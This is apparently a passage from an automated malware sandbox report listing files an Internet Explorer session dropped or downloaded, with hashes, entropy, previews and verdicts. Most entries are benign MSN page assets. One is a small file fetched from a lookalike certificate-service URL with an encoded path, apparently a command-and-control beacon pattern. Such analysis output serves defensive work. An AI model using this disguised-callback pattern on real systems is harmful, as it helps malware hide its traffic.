                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:D90aKb:JFKb
                                                                                                                                                                                                                      MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                                                                                                                                                      SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                                                                                                                                                      SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                                                                                                                                                      SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:high, very likely benign file
                                                                                                                                                                                                                      Preview: <root></root>
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2619
                                                                                                                                                                                                                      Entropy (8bit):4.874589992561583
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:0GmwsGmwsGmwsGmwscmwscmwscmwscmwscmw8mwscmwsjmwsjmwrmwsjmwsvmwsU:TfrfrfrfJfJfJfJfJf8fJf6f6frf6fmT
                                                                                                                                                                                                                      MD5:26DFA08AC5280FA59F5A4053477A2B46
                                                                                                                                                                                                                      SHA1:5D0DB68795E7716CA1214287ADFC00EB21F2B960
                                                                                                                                                                                                                      SHA-256:63C7BDF57C811608DF73C787368548AEF4D63E961A66051363174C79C5F3A656
                                                                                                                                                                                                                      SHA-512:01DA55DAD5C2E6FCC07B357C20F3F3DD029FA400760D863A933977C656F28A085EE0615FC8AF344FFF3037C0A4B98EEF8CBDF649552BE2A989BA56D72F1E2828
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: <root></root><root></root><root><item name="HBCM_BIDS" value="{}" ltime="1603301072" htime="30850618" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1603301072" htime="30850618" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1603301072" htime="30850618" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1603301072" htime="30850618" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1603581072" htime="30850618" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1603581072" htime="30850618" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1603581072" htime="30850618" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1603581072" htime="30850618" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1603581072" htime="30850618" /><item name="mntest" value="mntest" ltime="1607061072" htime="30850618" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1603581072" htime="30850618" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1610
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{99EDD371-2A2D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):67304
                                                                                                                                                                                                                      Entropy (8bit):2.107501598547394
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:ObSTKLKvvB8Rbw5bbwhRbmBGbmzROmcYyEmyhVyE2IGEREyE2UKyE2qplvyE2ZXP:2
                                                                                                                                                                                                                      MD5:76F9D53EEE42F04F7C0D375494CDBE40
                                                                                                                                                                                                                      SHA1:C3A6067387DC21552D90E690527E54CB85EFC574
                                                                                                                                                                                                                      SHA-256:6188B09FFF5C2E145C5E9AEFD444627FB7B3306FE6493CF20AD2CF1E3DA14E24
                                                                                                                                                                                                                      SHA-512:0615E37CDC29F39F5151DA4DD7D584FFBE2D16528054A937AC34513EC7D23AA6B406EB7E642CD5B05CA8C969800265CB06420332ACBC493AEE86A82FE450CC97
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99EDD373-2A2D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):193246
                                                                                                                                                                                                                      Entropy (8bit):3.6042310783029445
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:dtiqZ/2Bfc6ru5rXfVStviqZ/2BfcJru5rXfVStZ:aUA
                                                                                                                                                                                                                      MD5:F47B1D129AB33C1013CE76F17F47A5D3
                                                                                                                                                                                                                      SHA1:915ED0C36219C4348B2AA319562596C1C254F51E
                                                                                                                                                                                                                      SHA-256:8887EF721480A26EA6AAA2504BDD7DF18C70A64BBC2E45AAA25E80416646F5EA
                                                                                                                                                                                                                      SHA-512:D8F6BC07D80805334FC0DC68CE216977CB32E4ABDD8FE3575D3DEC3174F7C5CEE0B7F0818FC9F9ADD97FF9E352EA1087C54D482D2537A3DE6002533307A7AEFD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99EDD375-2A2D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):27340
                                                                                                                                                                                                                      Entropy (8bit):1.8362676340648143
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:rtZrQG6oBS4FjR2dkWwMzYeCV1xCVo92A:rtZrQG6ok4FjR2dkWwMzYeyx52A
                                                                                                                                                                                                                      MD5:554BFEBF9C9599095F0CD8634AE593E3
                                                                                                                                                                                                                      SHA1:FC087B4435CFC6767DC095866CD62D002E7B86E9
                                                                                                                                                                                                                      SHA-256:D442CDEB6F2BFF305F5725389DBBA175D7304DDC4A1A1911D38CAD2B7F8D3065
                                                                                                                                                                                                                      SHA-512:CC0E0DB0A034D744CCC6AF6BA188D1535FBE9597D2B33886183BC81FBAACCEF9A8615CA15A5F355460EBA86586311FF3E8FFEE351DED7E4FE192640D305F2AC6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B3431EC0-2A2D-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19032
                                                                                                                                                                                                                      Entropy (8bit):1.5939910378422844
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:Iw3GcprVjGwpaZG4pQlGrapbSerGQpB6GHHpcwsTGUpQRh+QGcpm:r9ZrQ76VBSeFjB2wk6v7g
                                                                                                                                                                                                                      MD5:8D569DE098FB9C38E4A4BF0E6E584BBB
                                                                                                                                                                                                                      SHA1:13A0C77ACD0A1C1139C5EFDDFEB2DDD2EF6CF19B
                                                                                                                                                                                                                      SHA-256:43FC09C818199209EC101AFD6FF8CD5CC39F26C46FFDBFEBF72133A85FCD25F7
                                                                                                                                                                                                                      SHA-512:374A71DA5F1CBB2976AA682ED03A731EE4AF6D85B302C8199F0AE7F8EF3AE6B8CA56F04F68EEDE056D01C88BBA217F7274D523401849D1D2B6B26F8C33AB85E8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):934
                                                                                                                                                                                                                      Entropy (8bit):7.031807242292058
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGC:u6tWu/6symC+PTCq5TcBUX4bY
                                                                                                                                                                                                                      MD5:E9A0EE0276EA71E46AD37A6E6C4623D8
                                                                                                                                                                                                                      SHA1:D0E2A459BBFF52B7FCA8828928F3F01FECE69C22
                                                                                                                                                                                                                      SHA-256:8CE66151634DC5EC90D67E50F122C3A858101AC715C07A8ABA6A3A361C5A8B9E
                                                                                                                                                                                                                      SHA-512:518A95589AA308B49906198718DBC0FFC5E295B4BE3730A7DCF419908B6D8B2DF5339BB0F6EFECE3A5FA2695BAEE450C8ADF32A642B2516B8261CBC44C851CB4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: E.h.t.t.p.s.:././.s.t.a.t.i.c.-.g.l.o.b.a.l.-.s.-.m.s.n.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.h.p.-.n.e.u./.s.c./.2.b./.a.5.e.a.2.1...i.c.o......PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`. ... .............._......._....
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\41-0bee62-68ddb2ab[1].js
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1238
                                                                                                                                                                                                                      Entropy (8bit):5.066474690445609
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                                                                                                                                                                                      MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                                                                                                                                                                                      SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                                                                                                                                                                                      SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                                                                                                                                                                                      SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: define("meOffice",["jquery","jqBehavior","mediator","refreshModules","headData","webStorage","window"],function(n,t,i,r,u,f,e){function o(t,o){function v(n){var r=e.localStorage,i,t,u;if(r&&r.deferLoadedItems)for(i=r.deferLoadedItems.split(","),t=0,u=i.length;t<u;t++)if(i[t]&&i[t].indexOf(n)!==-1){f.removeItem(i[t]);break}}function a(){var i=t.find("section li time");i.each(function(){var t=new Date(n(this).attr("datetime"));t&&n(this).html(t.toLocaleString())})}function p(){c=t.find("[data-module-id]").eq(0);c.length&&(h=c.data("moduleId"),h&&(l="moduleRefreshed-"+h,i.sub(l,a)))}function y(){i.unsub(o.eventName,y);r(s).done(function(){a();p()})}var s,c,h,l;return u.signedin||(t.hasClass("office")?v("meOffice"):t.hasClass("onenote")&&v("meOneNote")),{setup:function(){s=t.find("[data-module-deferred-hover], [data-module-deferred]").not("[data-sso-dependent]");s.length&&s.data("module-deferred-hover")&&s.html("<p class='meloading'><\/p>");i.sub(o.eventName,y)},teardown:function(){h&&i.un
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\4996b9[1].woff
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):45633
                                                                                                                                                                                                                      Entropy (8bit):6.523183274214988
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                                                                                                                                                      MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                                                                                                                                                      SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                                                                                                                                                      SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                                                                                                                                                      SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                                                                                                                                                                                                                      Preview: wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... .*...........I.A_.<........... ........d.*.......................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\55a804ab-e5c6-4b97-9319-86263d365d28[1].json
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):2830
                                                                                                                                                                                                                      Entropy (8bit):4.775944066465458
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:Y91lg9DHF6Bjb40UMRBrvdiZv5Gh8aZa6AyYAcHHPk5JKIDrZjSf4ZjfumjVLbf+:yy9Dwb40zrvdip5GHZa6AymsJjxjVj9i
                                                                                                                                                                                                                      MD5:46748D733060312232F0DBD4CAD337B3
                                                                                                                                                                                                                      SHA1:5AA8AC0F79D77E90A72651E0FED81D0EEC5E3055
                                                                                                                                                                                                                      SHA-256:C84D5F2B8855D789A5863AABBC688E081B9CA6DA3B92A8E8EDE0DC947BA4ABC1
                                                                                                                                                                                                                      SHA-512:BBB71BE8F42682B939F7AC44E1CA466F8997933B150E63D409B4D72DFD6BFC983ED779FABAC16C0540193AFB66CE4B8D26E447ECF4EF72700C2C07AA700465BE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/55a804ab-e5c6-4b97-9319-86263d365d28.json
                                                                                                                                                                                                                      Preview: {"CookieSPAEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":true,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","ws","gd","ge","gg","gh","gi","gl","gm","gn","gq","gs","gt"
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\755f86[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):390
                                                                                                                                                                                                                      Entropy (8bit):7.173321974089694
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:6v/lhPZ/SlkR7+RGjVjKM4H56b6z69eG3AXGxQm+cISwADBOwIaqOTp:6v/71IkR7ZjKHHIr8GxQJcISwy0W9
                                                                                                                                                                                                                      MD5:D43625E0C97B3D1E78B90C664EF38AC7
                                                                                                                                                                                                                      SHA1:27807FBFB316CF79C4293DF6BC3B3DE7F3CFC896
                                                                                                                                                                                                                      SHA-256:EF651D3C65005CEE34513EBD2CD420B16D45F2611E9818738FDEBF33D1DA7246
                                                                                                                                                                                                                      SHA-512:F2D153F11DC523E5F031B9AA16AA0AB1CCA8BB7267E8BF4FFECFBA333E1F42A044654762404AA135BD50BC7C01826AFA9B7B6F28C24FD797C4F609823FA457B1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                                                                                                                                                                                                                      Preview: .PNG........IHDR..............w=....MIDATH.c...?.6`hhx.......??........g.&hbb....... .R.R.K...x<..w..#!......O ....C..F___x2.....?...y..srr2...1011102.F.(.......Wp1qqq...6mbD..H....=.bt.....,.>}b.....r9........0.../_.DQ....Fj..m....e.2{..+..t~*...z.Els..NK.Z.............e....OJ.... |..UF.>8[....=...;/.............0.....v...n.bd....9.<.Z.t0......T..A...&....[......IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAJwziK[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):464
                                                                                                                                                                                                                      Entropy (8bit):7.2494098422360915
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/78/kFxdCu+rLCuYoT+WfszDX6GWuwKo9QVLJlINJk:cH6LCeT9pNKzVUJk
                                                                                                                                                                                                                      MD5:C4C7A51C01E16D1D03F0147EC628CA0E
                                                                                                                                                                                                                      SHA1:428B31826761AE62D9F9BBBC67BAC3B73B38F7B1
                                                                                                                                                                                                                      SHA-256:0845F028115F47C56A7172277D0F63F015A13E32E0702FBE8854433F08060CA8
                                                                                                                                                                                                                      SHA-512:E2A31438C113DF318A284B9C547F7916FF6DBD94A3CB12141F5F291D6EFDB77D98BA9806DEEF2DC6DDF5E8390D04090AAB22AE55366F3FBCE52A4E4C2D7CDC32
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJwziK.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........(J....eIDAT8O.S.J.@.=I.GE.M..T.....|.....UP.A......q.Bp.....Z|.-.`Sm..Ug&R..U.<p9...3w...vG.y...^......V.o@..?..(..iB... ..o.....2v|.13.8...eY.[..n.v.o.&.$...N.=.Jt...H....&.i......I...*.u...EQDfj.....'.HH....}....G~9...$IDZO.`...Z........n.8:>....~......%....4......nn.qU*.y=&.._\B.b(.U..*x..a..C.Q.a.Mxd.....F.A.....S(...I.......X.5...+Db....+...Ut..C.;X..Cl.R.....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAyuliQ[1].png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):435
                                                                                                                                                                                                                      Entropy (8bit):7.145242953183175
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/78/W/6TKob359YEwQsQP+oaNwGzr5jl39HL0H7YM7:U/6pbJPgQP+bVRt9r0H8G
                                                                                                                                                                                                                      MD5:D675AB16BA50C28F1D9D637BBEC7ECFF
                                                                                                                                                                                                                      SHA1:C5420141C02C83C3B3A3D3CD0418D3BCEABB306A
                                                                                                                                                                                                                      SHA-256:E11816F8F2BBC3DC8B2BE84323D6B781B654E80318DC8D02C35C8D7D81CB7848
                                                                                                                                                                                                                      SHA-512:DA3C25D7C998F60291BF94F97A75DE6820C708AE2DF80279F3DA96CC0E647E0EB46E94E54EFFAC4F72BA027D8FB1E16E22FB17CF9AE3E069C2CA5A22F5CC74A4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                                                      Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs................HIDAT8O.KK.Q.....v...me....H.}.D.............A$.=..=h.J..:..H...;qof?.M........?..gg.j*.X..`/e8.10...T......h..\?..7)q8.MB..u.-...?..G.p.O...0N.!.. .......M............hC.tVzD...+?....Wz}h...8.+<..T._..D.P.p&.0.v....+r8.tg..g .C..a18G...Q.I.=..V1......k...po.+D[^..3SJ.X..x...`..@4..j..1x'.h.V....3..48.{$BZW.z.>....w4~.`..m....IEND.B`.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Au9[1].avi
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):5
                                                                                                                                                                                                                      Entropy (8bit):2.321928094887362
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:3:3
                                                                                                                                                                                                                      MD5:5BFA51F3A417B98E7443ECA90FC94703
                                                                                                                                                                                                                      SHA1:8C015D80B8A23F780BDD215DC842B0F5551F63BD
                                                                                                                                                                                                                      SHA-256:BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
                                                                                                                                                                                                                      SHA-512:4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:http://ocsp.sca1b.amazontrust.com/images/lcFsCCu6XNM4pzjDX9/Rf920MsPd/vgweJGGW4yMpnFFbKRdb/rMLnID4pno1jhDPg_2B/gCtnp5OejYlg5M0Xpnwv8O/gpi95pzZNi_2F/y_2F9cQy/vDMvSxl_2BNU9G_2FwH_2BP/AZJJtDQfBY/TKL237DbsWcS1Nmtn/Au9.avi
                                                                                                                                                                                                                      Preview: 0....
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB14EN7h[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):10663
                                                                                                                                                                                                                      Entropy (8bit):7.715872615198635
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:BpV23EiAqPWo2rhmHI2NF5IZr9Q8yES4+e5B0k9F8OdqmQzMs:7PiAqnHICF5IVVyxk5BB9tdq3Z
                                                                                                                                                                                                                      MD5:A1ED4EB0C8FE2739CE3CB55E84DBD10F
                                                                                                                                                                                                                      SHA1:7A185F8FF5FF1EC11744B44C8D7F8152F03540D5
                                                                                                                                                                                                                      SHA-256:17917B48CF2575A9EA5F845D8221BFBC2BA2C039B2F3916A3842ECF101758CCB
                                                                                                                                                                                                                      SHA-512:232AE7AB9D6684CDF47E73FB15B0B87A32628BAEEA97709EA88A24B6594382D1DF957E739E7619EC8E8308D5912C4B896B329940D6947E74DCE7FC75D71C6842
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14EN7h.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                                                      Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...E.(.Y....E.D....=h...<t.S......5i..9.. .:..".R..i...dt&..J..!...P..m&..5`VE..|..j.d...i..qL=x...4.S@..u.4.J.u.....Ju%.FEU..I.*.]#4.3@.6...yH...=..}.#....bx...1s...O.....7R....."U...........jY.'.L.0..ST.M.:t3...9...2.:.0$...V..A..w..o..T.Y#...=).K..+.....XV...n;......}.37.........:.!E.P.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%...RQ@.E%-...uE,.
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB15AQNm[1].jpg
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):23518
